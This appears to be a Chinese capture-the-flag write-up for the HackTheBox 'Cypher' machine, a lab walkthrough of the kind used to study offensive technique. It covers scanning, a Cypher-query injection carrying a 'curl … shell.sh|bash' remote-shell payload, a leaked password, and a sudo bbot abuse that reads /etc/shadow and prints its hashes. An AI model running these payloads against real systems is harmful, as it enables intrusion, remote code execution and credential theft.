基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nmap -sC -sV -Pn 10.10.11.57
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-05 08:55 CST
Nmap scan report for 10.10.11.57
Host is up (0.070s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 be:68:db:82:8e:63:32:45:54:46:b7:08:7b:3b:52:b0 (ECDSA)
|_ 256 e5:5b:34:f5:54:43:93:f8:7e:b6:69:4c:ac:d6:3d:23 (ED25519)
80/tcp open http nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cypher.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.07 seconds

80

需要加hosts:

1
10.10.11.57 cypher.htb

ASM相关的:

目录扫描

常规目录扫描:

1
2
3
4
5
6
7
8
9
gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://cypher.htb/

/about (Status: 200) [Size: 4986]
/api (Status: 307) [Size: 0] [--> /api/docs]
/demo (Status: 307) [Size: 0] [--> /login]
/index (Status: 200) [Size: 4562]
/index.html (Status: 200) [Size: 4562]
/login (Status: 200) [Size: 3671]
/testing (Status: 301) [Size: 178] [--> http://cypher.htb/testing/]

testing

testing中可以看到一个jar文件,下载到本地分析:

CustomFunction

很容易看到一个可能的命令注入:

sql注入

但首先需要登录,尝试sql注入,根据报错信息知道使用cypher query:

命令注入

所以就可以通过注入执行cypher query来调用存在命令注入的函数:

1
admin' return h.value as a UNION CALL custom.getUrlStatusCode(\"example.com;curl 10.10.14.2:7777/shell.sh|bash;#\") YIELD statusCode AS a RETURN a;//

打到neo4j用户:

user flag

graphasm用户目录,可读的bbot_preset.yml文件中密码就是graphasm密码,可以直接ssh方便后续操作:

1
2
username: neo4j
password: cU4btyib.20xtCMCXkBmerhK

提权信息

graphasm可以sudo运行/usr/local/bin/bbot:

而bbot运行时可以使用自定义yara规则之类,并且使用的规则内容也会显示在调试输出中

提权 & root flag

所以就是bbot读取任意文件:

1
2
3
sudo /usr/local/bin/bbot --custom-yara-rules /root/root.txt -d --dry-run

sudo /usr/local/bin/bbot --custom-yara-rules /etc/shadow -d --dry-run

shadow

1
2
root:$y$j9T$ianAmmc1w6VSodw.1fzgk/$3DenO5YJ1VBvE1VekRL79v6bN00fhcbA59zeeLciY67:20133:0:99999:7:::
graphasm:$y$j9T$lDLyqZAxCXhX1EB3v01Zl.$C0XwosQvBM.5sAPbHd8oyAK0e8lg0GX5YJHb7qImQV7:20004:0:99999:7:::

参考资料